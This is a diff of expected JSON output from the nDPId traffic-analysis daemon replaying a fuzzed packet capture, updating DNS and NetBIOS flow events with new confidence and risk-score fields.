 00355{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"ts_msec":1120470916876,"pkt":"ADBUADRWAODtAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00423{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120470923515,"pkt":"\/\/\/\/\/\/\/\/AODtAW4zDABFAABOa+AAAIARSm3AqAECwKgB\/wCJAIkAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":3072}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470924263,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1120470924263,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470924263,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+EAAIARSmzAqAECwKgB\/wCJA4kAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVIQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470764674,"flow_last_seen":1120470768028,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470832512,"flow_last_seen":1120470840523,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1120470949427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470949427,"pkt":"ADBUADRWAODtAW69CABFAABIa+MAAIARS27AqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3lhZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyaercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470949427,"flow_last_seen":1120470949427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470949427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyaercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1120470950421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470950421,"pkt":"ADBUADRWAODtAW49CABFAABIa+QAAIARS23AqAECwKgBAQr8ADUANNjGUZgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":596,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470949427,"flow_last_seen":1120470950421,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470950421,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1120470952424,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470952424,"pkt":"ADBUADRWAODtAW69CABFAABIa+UAAIARS2zAqAECwKgBAQr8ADUANNjGUQIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470954427,"pkt":"ADBUADRWAODtAW69CABFAABIa+YAEIARS6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":598,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470774132,"flow_last_seen":1120470774132,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.108.1","src_port":2794,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1120469540839,"flow_last_seen":1120470925015,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1120469540839,"flow_last_seen":1120470925015,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1120470966440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470966440,"pkt":"ADBUADRWAODtAW69CABFAABEa+gAAIARS23AqAECwKgBAQr9ADUAMIS+oAMAAAABAAAAAAAAATEBMAEwEzEyNwdpbi1hZGByBGFycGEAAAwAAQ=="}
-00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470966440,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127?in-ad_r?arpa???","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
